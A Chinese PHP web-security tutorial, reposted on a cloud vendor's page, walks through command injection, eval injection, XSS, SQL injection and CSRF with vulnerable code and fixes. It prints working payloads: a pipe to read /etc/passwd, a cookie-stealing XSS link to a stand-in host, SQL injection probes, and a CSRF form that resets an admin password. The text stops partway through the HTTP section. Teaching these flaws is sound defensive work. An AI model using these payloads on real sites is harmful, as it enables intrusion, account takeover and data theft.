PHP漏洞全解

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介: PHP漏洞全解   浏览:1410 发布日期:2015/04/14 分类:用法示例 针对PHP的网站主要存在下面几种攻击方式针对PHP的网站主要存在下面几种攻击方式:   1、命令注入(Command Injection)   2、eval注入(Eval Injectio...

PHP漏洞全解

 
浏览:1410 发布日期:2015/04/14 分类:用法示例
针对PHP的网站主要存在下面几种攻击方式
    1. 针对PHP的网站主要存在下面几种攻击方式: 
    2.  1、命令注入(Command Injection) 
    3.  2eval注入(Eval Injection) 
    4.  3、客户端脚本攻击(Script Insertion) 
    5.  4、跨网站脚本攻击(Cross Site Scripting, XSS) 
    6.  5SQL注入攻击(SQL injection) 
    7.  6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 
    8.  7Session 会话劫持(Session Hijacking) 
    9.  8Session 固定攻击(Session Fixation) 
    10.  9HTTP响应拆分攻击(HTTP Response Splitting) 
    11.  10、文件上传漏洞(File Upload Attack) 
    12.  11、目录穿越漏洞(Directory Traversal) 
    13.  12、远程文件包含攻击(Remote Inclusion) 
    14.  13、动态函数注入攻击(Dynamic Variable Evaluation) 
    15.  14URL攻击(URL attack) 
    16.  15、表单提交欺骗攻击(Spoofed Form Submissions) 
    17.  16HTTP请求欺骗攻击(Spoofed HTTP Requests) 
    18.  命令注入攻击 
    19. PHP中可以使用下列5个函数来执行外部的应用程序或函数 
    20. systemexecpassthrushell_exec、“(与shell_exec功能相同) 
    21.  函数原型 
    22.  string system(string command, int &return_var) 
    23. command 要执行的命令 
    24. return_var 存放执行命令的执行后的状态值 
    25.  string exec (string command, array &output, int &return_var) 
    26. command 要执行的命令 
    27. output 获得执行命令输出的每一行字符串 
    28. return_var 存放执行命令后的状态值 
    29.  void passthru (string command, int &return_var) 
    30. command 要执行的命令 
    31. return_var 存放执行命令后的状态值 
    32.  string shell_exec (string command) 
    33. command 要执行的命令 
    34.  漏洞实例 
    35.  1:
    36.  //ex1.php
    37.  <?php
    38. $dir = $_GET["dir"];
    39.  if (isset($dir))
    40.  {
    41.         echo "<pre>";
    42.         system("ls -al ".$dir);
    43.         echo "</pre>";
    44.  }
    45.  ?>
    46.  我们提交http://www.sectop.com/ex1.php?dir=| cat /etc/passwd
    47.  提交以后,命令变成了 system("ls -al | cat /etc/passwd");
    48.  eval注入攻击
    49.  eval函数将输入的字符串参数当作PHP程序代码来执行
    50.  函数原型:
    51. mixed eval(string code_str) //eval注入一般发生在攻击者能控制输入的字符串的时候
    52.  //ex2.php
    53.  <?php
    54. $var = "var";
    55.  if (isset($_GET["arg"]))
    56.  {
    57.         $arg = $_GET["arg"];
    58.         eval("\$var = $arg;");
    59.         echo "\$var =".$var;
    60.  }
    61.  ?>
    62.  当我们提交 http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了
    63.  动态函数
    64.  <?php
    65. func A()
    66.  {
    67.         dosomething();
    68.  }
    69. func B()
    70.  {
    71.         dosomething();
    72.  }
    73.  if (isset($_GET["func"]))
    74.  {
    75.         $myfunc = $_GET["func"];
    76.         echo $myfunc();
    77.  }
    78.  ?>
    79.  程序员原意是想动态调用AB函数,那我们提交http://www.sectop.com/ex.php?func=phpinfo 漏洞产生
    80.  防范方法
    81.  1、尽量不要执行外部命令
    82.  2、使用自定义函数或函数库来替代外部命令的功能
    83.  3、使用escapeshellarg函数来处理命令参数
    84.  4、使用safe_mode_exec_dir指定可执行文件的路径
    85. esacpeshellarg函数会将任何引起参数或命令结束的字符转义,单引号“'”,替换成“\'”,双引号“"”,替换成“\"”,分号“;”替换成“\;”
    86. 用safe_mode_exec_dir指定可执行文件的路径,可以把会使用的命令提前放入此路径内
    87. safe_mode = On
    88. safe_mode_exec_di r= /usr/local/php/bin/
    89. 客户端脚本植入
    90. 客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接文字等对象内。当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。
    91. 可以被用作脚本植入的HTML标签一般包括以下几种:
    92. 1、<script>标签标记的javascript和vbscript等页面脚本程序。在<script>标签内可以指定js程序代码,也可以在src属性内指定js文件的URL路径
    93. 2、<object>标签标记的对象。这些对象是java applet、多媒体文件和ActiveX控件等。通常在data属性内指定对象的URL路径
    94. 3、<embed>标签标记的对象。这些对象是多媒体文件,例如:swf文件。通常在src属性内指定对象的URL路径
    95. 4、<applet>标签标记的对象。这些对象是java applet,通常在codebase属性内指定对象的URL路径
    96. 5、<form>标签标记的对象。通常在action属性内指定要处理表单数据的web应用程序的URL路径
    97. 客户端脚本植入的攻击步骤
    98. 1、攻击者注册普通用户后登陆网站
    99. 2、打开留言页面,插入攻击的js代码
    100. 3、其他用户登录网站(包括管理员),浏览此留言的内容
    101. 4、隐藏在留言内容中的js代码被执行,攻击成功
    102. 实例
    103. 数据库
    104. CREATE TABLE `postmessage` (
    105.   `id` int(11) NOT NULL auto_increment,
    106.   `subject` varchar(60) NOT NULL default ”,
    107.   `name` varchar(40) NOT NULL default ”,
    108.   `email` varchar(25) NOT NULL default ”,
    109.   `question` mediumtext NOT NULL,
    110.   `postdate` datetime NOT NULL default '0000-00-00 00:00:00′,
    111.   PRIMARY KEY  (`id`)
    112.  ) ENGINE=MyISAM  DEFAULT CHARSET=gb2312 COMMENT='使用者的留言' AUTO_INCREMENT=69 ;
    113.  //add.php 插入留言
    114.  //list.php 留言列表
    115.  //show.php 显示留言
    116.  提交下图的留言
    117.  浏览此留言的时候会执行js脚本
    118.  插入 <script>while(1){windows.open();}</script> 无限弹框
    119.  插入<script>location.href="http://www.sectop.com";</script> 跳转钓鱼页面
    120.  或者使用其他自行构造的js代码进行攻击
    121.  防范的方法
    122.  一般使用htmlspecialchars函数来将特殊字符转换成HTML编码
    123.  函数原型
    124.  string htmlspecialchars (string string, int quote_style, string charset)
    125.  string 是要编码的字符串 
    126. quote_style 可选,值可为ENT_COMPATENT_QUOTESENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,表示双引号和单引号都要转换。ENT_NOQUOTES,表示双引号和单引号都不转换 
    127. charset 可选,表示使用的字符集
    128.  函数会将下列特殊字符转换成html编码:
    129.  & —-> &
    130.  " —-> "
    131.   —-> 
    132.  < —-> <
    133.  > —-> >
    134.  show.php的第98行改成
    135.  <?php echo htmlspecialchars(nl2br($row['question']), ENT_QUOTES); ?>
    136.  然后再查看插入js的漏洞页面
    137.  
    138. XSS跨站脚本攻击
    139.  
    140. XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS
    141.  跨站脚本主要被攻击者利用来读取网站用户的cookies或者其他个人数据,一旦攻击者得到这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限。
    142.  跨站脚本攻击的一般步骤:
    143.  1、攻击者以某种方式发送xsshttp链接给目标用户
    144.  2、目标用户登录此网站,在登陆期间打开了攻击者发送的xss链接
    145.  3、网站执行了此xss攻击脚本
    146.  4、目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息
    147.  5、攻击者使用目标用户的信息登录网站,完成攻击
    148.  当有存在跨站漏洞的程序出现的时候,攻击者可以构造类似 http://www.sectop.com/search.php?key=<script>document.location='http://www.hack.com/getcookie.php?cookie='+document.cookie;</script> ,诱骗用户点击后,可以获取用户cookies值
    149.  防范方法:
    150.  利用htmlspecialchars函数将特殊字符转换成HTML编码
    151.  函数原型
    152.  string htmlspecialchars (string string, int quote_style, string charset)
    153.         string 是要编码的字符串 
    154.         quote_style 可选,值可为ENT_COMPATENT_QUOTESENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,表示双引号和单引号都要转换。ENT_NOQUOTES,表示双引号和单引号都不转换 
    155.         charset 可选,表示使用的字符集
    156.  函数会将下列特殊字符转换成html编码:
    157.  & —-> &
    158.  " —-> "
    159.   —-> 
    160.  < —-> <
    161.  > —-> >
    162. $_SERVER["PHP_SELF"]变量的跨站
    163.  在某个表单中,如果提交参数给自己,会用这样的语句
    164.  <form action="<?php echo $_SERVER["PHP_SELF"];?>" method="POST">
    165.  ……
    166.  </form>
    167. $_SERVER["PHP_SELF"]变量的值为当前页面名称
    168. 例:
    169. http://www.sectop.com/get.php
    170.  get.php中上述的表单
    171.  那么我们提交
    172. http://www.sectop.com/get.php/"><script>alert(document.cookie);</script>
    173.  那么表单变成
    174.  <form action="get.php/"><script>alert(document.cookie);</script>" method="POST">
    175. 跨站脚本被插进去了
    176. 防御方法还是使用htmlspecialchars过滤输出的变量,或者提交给自身文件的表单使用
    177. <form action="" method="post">
    178. 这样直接避免了$_SERVER["PHP_SELF"]变量被跨站
    179.  
    180. SQL注入攻击
    181.  
    182. SQL注入攻击(SQL Injection),是攻击者在表单中提交精心构造的sql语句,改动原来的sql语句,如果web程序没有对提交的数据经过检查,那么就会造成sql注入攻击。
    183.   SQL注入攻击的一般步骤:
    184.   1、攻击者访问有SQL注入漏洞的站点,寻找注入点
    185.   2、攻击者构造注入语句,注入语句和程序中的SQL语句结合生成新的sql语句
    186.   3、新的sql语句被提交到数据库中执行 处理
    187.   4、数据库执行了新的SQL语句,引发SQL注入攻击
    188.  实例
    189.   数据库
    190.   CREATE TABLE `postmessage` (
    191.   `id` int(11) NOT NULL auto_increment,
    192.   `subject` varchar(60) NOT NULL default ”,
    193.   `name` varchar(40) NOT NULL default ”,
    194.   `email` varchar(25) NOT NULL default ”,
    195.   `question` mediumtext NOT NULL,
    196.   `postdate` datetime NOT NULL default '0000-00-00 00:00:00′,
    197.   PRIMARY KEY  (`id`)
    198.   ) ENGINE=MyISAM  DEFAULT CHARSET=gb2312 COMMENT='运用者的留言' AUTO_INCREMENT=69 ;
    199.   grant all privileges on ch3.* to ‘sectop'@localhost identified by '123456′;
    200.   //add.php 插入留言
    201.   //list.php 留言列表
    202.   //show.php 显示留言
    203.   页面 http://www.netsos.com.cn/show.php?id=71 可能存在注入点,我们来测试
    204.   http://www.netsos.com.cn/show.php?id=71 and 1=1
    205.   返回页面
    206.  
    207. 提交 
    208.   一次查询到记录,一次没有,我们来看看源码
    209.   //show.php 12-15行
    210.   // 执行mysql查询语句
    211.   $query = "select * from postmessage where id = ".$_GET["id"];
    212.   $result = mysql_query($query)
    213.   or die("执行ySQL查询语句失败:" . mysql_error());
    214.   参数id传递进来后,和前面的字符串结合的sql语句放入数据库执行 查询
    215.   提交 and 1=1,语句变成select * from postmessage where id = 71 and 1=1 这语句前值后值都为真,and以后也为真,返回查询到的数据
    216.   提交 and 1=2,语句变成select * from postmessage where id = 71 and 1=2 这语句前值为真,后值为假,and以后为假,查询不到任何数据
    217.   正常的SQL查询,经过我们构造的语句之后,形成了SQL注入攻击。通过这个注入点,我们还可以进一步拿到权限,比如说运用 union读取管理密码,读取数据库信息,或者用mysql的load_file,into outfile等函数进一步渗透。
    218. 防范方法
    219.  整型参数:
    220.   运用 intval函数将数据转换成整数
    221.   函数原型
    222.   int intval(mixed var, int base)
    223.           var是要转换成整形的变量
    224.           base,可选,是基础数,默认是10
    225.   浮点型参数:
    226.   运用 floatval或doubleval函数分别转换单精度和双精度浮点型参数
    227.   函数原型
    228.   int floatval(mixed var)
    229.           var是要转换的变量
    230.      int doubleval(mixed var)
    231.           var是要转换的变量
    232.   字符型参数:
    233.   运用 addslashes函数来将单引号“'”转换成“\'”,双引号“"”转换成“\"”,反斜杠“\”转换成“\\”,NULL字符加上反斜杠“\”
    234.   函数原型
    235.  string addslashes (string str)
    236.           str是要检查的字符串
    237.   那么刚才出现的代码漏洞,我们可以这样修补
    238.   // 执行mysql查询语句
    239.   $query = "select * from postmessage where id = ".intval($_GET["id"]);
    240.   $result = mysql_query($query)
    241.  or die("执行ySQL查询语句失败:" . mysql_error());
    242.  
    243.   如果是字符型,先判断magic_quotes_gpc能无法 On,当不为On的时候运用 addslashes转义特殊字符
    244.   if(get_magic_quotes_gpc())
    245.   {
    246.   $var = $_GET["var"];
    247.   }
    248.   else
    249.   {
    250.   $var = addslashes($_GET["var"]);
    251.   }
    252.   再次测试,漏洞已经修补
    253.  
    254.  垮网站伪造请求
    255.  
    256. CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。
    257.  例如:某个购物网站购买商品时,采用http://www.shop.com/buy.php?item=watch&num=1,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接
    258.  <img src="http://www.shop.com/buy.php?item=watch&num=1000"/>,那么如果目标用户不小心访问以后,购买的数量就成了1000
    259.  实例
    260.  随缘网络PHP留言板V1.0
    261.  任意删除留言
    262.  //delbook.php 此页面用于删除留言
    263.  <?php
    264. include_once("dlyz.php");    //dlyz.php用户验证权限,当权限是admin的时候方可删除留言
    265. include_once("../conn.php");
    266. $del=$_GET["del"];
    267. $id=$_GET["id"];
    268.  if ($del=="data")
    269.  {
    270. $ID_Dele= implode(",",$_POST['adid']);
    271. $sql="delete from book where id in (".$ID_Dele.")";
    272. mysql_query($sql);
    273.  }
    274.  else
    275.  {
    276. $sql="delete from book where id=".$id; //传递要删除的留言ID
    277. mysql_query($sql);
    278.  }
    279. mysql_close($conn);
    280. echo "<script language='javascript'>"; 
    281. echo "alert(‘删除成功!');";
    282. echo " location='book.php';"; 
    283. echo "</script>";
    284.  ?>
    285.  当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言
    286.  利用方法:
    287.  我们使用普通用户留言(源代码方式),内容为
    288.  <img src="delbook.php?id=2" />
    289.  <img src="delbook.php?id=3" />
    290.  <img src="delbook.php?id=4" />
    291.  <img src="delbook.php?id=5" />
    292.  插入4张图片链接分别删除4id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了 
    293.  现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。
    294.  攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了
    295.  修改管理员密码
    296.  //pass.php
    297.  if($_GET["act"])
    298.  {
    299. $username=$_POST["username"];
    300. $sh=$_POST["sh"];
    301. $gg=$_POST["gg"];
    302. $title=$_POST["title"];
    303. $copyright=$_POST["copyright"]."<br/>设计制作:<a href=http://www.115cn.cn>厦门随缘网络科技</a>";
    304. $password=md5($_POST["password"]);
    305.  if(empty($_POST["password"]))
    306.  {
    307. $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
    308.  }
    309.  else
    310.  {
    311. $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
    312.  }
    313. mysql_query($sql);
    314. mysql_close($conn);
    315. echo "<script language='javascript'>"; 
    316. echo "alert(‘修改成功!');";
    317. echo " location='pass.php';"; 
    318. echo "</script>";
    319.  }
    320.  这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:
    321.  <body>
    322.  <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
    323.  <input type="radio" value="1"  name="sh">
    324.  <input type="radio" name="sh" checked value="0"> 
    325.  <input type="text" name="username" value="root">
    326.  <input type="password" name="password" value="root"> 
    327.  <input type="text"  name="title"  value="随缘网络PHP留言板V1.0(带审核功能)" >
    328.  <textarea  name="gg"  rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!</textarea>
    329.  <textarea  name="copyright"  rows="6" cols="80" >随缘网络PHP留言本V1.0  版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名</textarea>
    330.  </form>
    331. </body>
    332.  存为attack.html,放到自己网站上http://www.sectop.com/attack.html,此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root
    333.  防范方法
    334.  防范CSRF要比防范其他攻击更加困难,因为CSRFHTTP请求虽然是攻击者伪造的,但是却是由目标用户发出的,一般常见的防范方法有下面几种:
    335.  1、检查网页的来源
    336.  2、检查内置的隐藏变量
    337.  3、使用POST,不要使用GET
    338.  检查网页来源
    339.  //pass.php头部加入以下红色字体代码,验证数据提交
    340.  if($_GET["act"])
    341.  {
    342.  if(isset($_SERVER["HTTP_REFERER"]))
    343.  {
    344.         $serverhost = $_SERVER["SERVER_NAME"];
    345.         $strurl   = str_replace("http://","",$_SERVER["HTTP_REFERER"]);  
    346.         $strdomain = explode("/",$strurl);           
    347.         $sourcehost    = $strdomain[0];              
    348.         if(strncmp($sourcehost, $serverhost, strlen($serverhost)))
    349.         {
    350.                 unset($_POST);
    351.                 echo "<script language='javascript'>"; 
    352.                 echo "alert(‘数据来源异常!');";
    353.       &
    354. nbsp;         echo " location='index.php';"; 
    355.                 echo "</script>";
    356.         }
    357.  }
    358. $username=$_POST["username"];
    359. $sh=$_POST["sh"];
    360. $gg=$_POST["gg"];
    361. $title=$_POST["title"];
    362. $copyright=$_POST["copyright"]."<br/>设计制作:<a href=http://www.115cn.cn>厦门随缘网络科技</a>";
    363. $password=md5($_POST["password"]);
    364.  if(empty($_POST["password"]))
    365.  {
    366. $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
    367.  }
    368.  else
    369.  {
    370. $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
    371.  }
    372. mysql_query($sql);
    373. mysql_close($conn);
    374. echo "<script language='javascript'>"; 
    375. echo "alert(‘修改成功!');";
    376. echo " location='pass.php';"; 
    377. echo "</script>";
    378.  }
    379.  检查内置隐藏变量
    380.  我们在表单中内置一个隐藏变量和一个session变量,然后检查这个隐藏变量和session变量是否相等,以此来判断是否同一个网页所调用
    381.  <?php
    382. include_once("dlyz.php");
    383. include_once("../conn.php");
    384.  if($_GET["act"])
    385.  {
    386.  if (!isset($_SESSION["post_id"]))
    387.  {
    388.          // 生成唯一的ID,并使用MD5来加密
    389.          $post_id = md5(uniqid(rand(), true));
    390.          // 创建Session变量
    391.          $_SESSION["post_id"] = $post_id;
    392.  }
    393.  // 检查是否相等
    394.  if (isset($_SESSION["post_id"]))
    395.  {
    396.          // 不相等
    397.          if ($_SESSION["post_id"] != $_POST["post_id"])
    398.          {
    399.                   // 清除POST变量
    400.                   unset($_POST);
    401.                   echo "<script language='javascript'>"; 
    402.                   echo "alert(‘数据来源异常!');";
    403.                   echo " location='index.php';";         
    404.                   echo "</script>";
    405.          }
    406.  }
    407.  ……
    408.     <input type="reset" name="Submit2" value="重  置">
    409.  <input type="hidden" name="post_id" value="<?php echo $_SESSION["post_id"];?>">
    410.  </td></tr>
    411.   </table>
    412. </form>
    413.  <?php 
    414.  } 
    415. mysql_close($conn);
    416.  ?>
    417.  </body>
    418. </html>
    419.  使用POST,不要使用GET
    420.  传递表单字段时,一定要是用POST,不要使用GET,处理变量也不要直接使用$_REQUEST
    421.  
    422. http响应拆分
    423.  
    424. HTTP请求的格式
    425.  1)请求信息:例如“Get /index.php HTTP/1.1”,请求index.php文件
    426.  2)表头:例如“Host: localhost”,表示服务器地址
    427.  3)空白行
    428.  4)信息正文
    429.  “请求信息”和“表头”都必须使用换行字符(CRLF)来结尾,空白行只能包含换行符,不可以有其他空格符。
    430.  下面例子发送HTTP请求给服务器www.yhsafe.com
    431. GET /index.php HTTP/1.1        //请求信息   
    432.  Host:www.yhsafe.com      //表头
    433.                                                       //空格行
    434.  
    435.     ↙符号表示回车键,在空白行之后还要在按一个空格才会发送HTTP请求,HTTP请求的表头中只有Host表头是必要的饿,其余的HTTP表头则是根据HTTP请求的内容而定。
    436.  
    437. HTTP请求的方法
    438.  1GET:请求响应
    439.  2HEAD:与GET相同的响应,只要求响应表头
    440.  3POST:发送数据给服务器处理,数据包含在HTTP信息正文中
    441.  4PUT:上传文件
    442.  5DELETE:删除文件
    443.  6TRACE:追踪收到的请求
    444.  7OPTIONS:返回服务器所支持的HTTP请求的方法
    445.  8CONNECT:将HTTP请求的连接转换成透明的TCP/IP通道
    446.  
    447. HTTP响应的格式
    448.  服务器在处理完客户端所提出的HTTP请求后,会发送下列响应。
    449.  1)第一行是状态码
    450.  2)第二行开始是其他信息
    451.  状态码包含一个标识状态的数字和一个描述状态的单词。例如:
    452. HTTP/1.1 200 OK
    453.  200是标识状态的是数字,OK则是描述状态的单词,这个状态码标识请求成功。
    454. HTTP请求和响应的例子
    455.  打开cmd输入telnet,输入open www.00aq.com 80
    456.  打开连接后输入
    457. GET /index.php HTTP/1.1      
    458.  Host:www.00aq.com     
    459.                                                 
    460.  
    461.  返回HTTP响应的表头
    462.  返回的首页内容
    463.  使用PHP来发送HTTP请求
    464. header函数可以用来发送HTTP请求和响应的表头
    465.  函数原型
    466.  void header(string string 
相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
3月前
|
SQL 安全 API
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
91 4
|
5月前
|
安全 前端开发 测试技术
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
|
6月前
|
安全 PHP 数据库
【PHP开发专栏】PHP文件包含漏洞与防范
【4月更文挑战第30天】本文探讨了PHP文件包含漏洞,该漏洞让攻击者能执行恶意代码或访问敏感信息。文章分为三部分:原理、影响和防范。文件包含函数(如`include`和`require`)在攻击者控制文件名时可能导致漏洞。影响包括执行恶意代码、泄露敏感信息和影响服务器性能。防范措施包括验证文件名安全性、使用安全包含函数、设置安全包含路径和参数,以及定期更新和维护代码及库。开发者应重视此问题,采取相应措施保障应用安全。
130 0
|
6月前
|
安全 PHP
零基础学习挖掘PHP网站漏洞
本套课程,分为三个阶段:第一阶段:基础篇 学习PHP开发的基础知识,对PHP常见的漏洞进行分析,第二阶段:进阶篇 实战PHP漏洞靶场,了解市面上的PHP主流网站开发技术,并对市面上的主流框架进行漏洞分析,第三阶段:高级篇 实战演示PHP代码审计技术,并能手动开发PHP框架,了解大型网站的核心技术!
60 2
|
安全 PHP 数据安全/隐私保护
PHP审计-实战变量覆盖漏洞
PHP审计-实战变量覆盖漏洞
|
SQL 安全 JavaScript
跨站脚本攻击 (XSS)和SQL注入漏洞php排查解决方案
跨站脚本攻击 (XSS)和SQL注入漏洞php排查解决方案
220 0
|
SQL 安全
dedecms cookies泄漏导致SQL漏洞 article_add.php 的解决方法
漏洞名称:dedecms cookies泄漏导致SQL漏洞 补丁文件:/member/article_add.php 补丁来源:云盾自研 漏洞描述:dedecms的文章发表表单中泄漏了用于防御CSRF的核心cookie,同时在其他核心支付系统也使用了同样的cookie进行验证,黑客可利用泄漏的cookie通过后台验证,进行后台注入。
102 0
|
弹性计算 安全
dedecms上传漏洞uploadsafe.inc.php 整理
自从买了阿里云的ecs 之后每次出现漏洞阿里云盾就会通知,前段时间部署的项目检测出上传漏洞 根据网上大神们的博客整理了下,下面这个是可行的 dedecms上传漏洞uploadsafe.inc.php,这里整理了大神们对于这个漏洞的解释
102 0
|
存储 SQL 缓存
干货 | PHP反序列化原理及不同类别反序列化漏洞总结
干货 | PHP反序列化原理及不同类别反序列化漏洞总结
235 0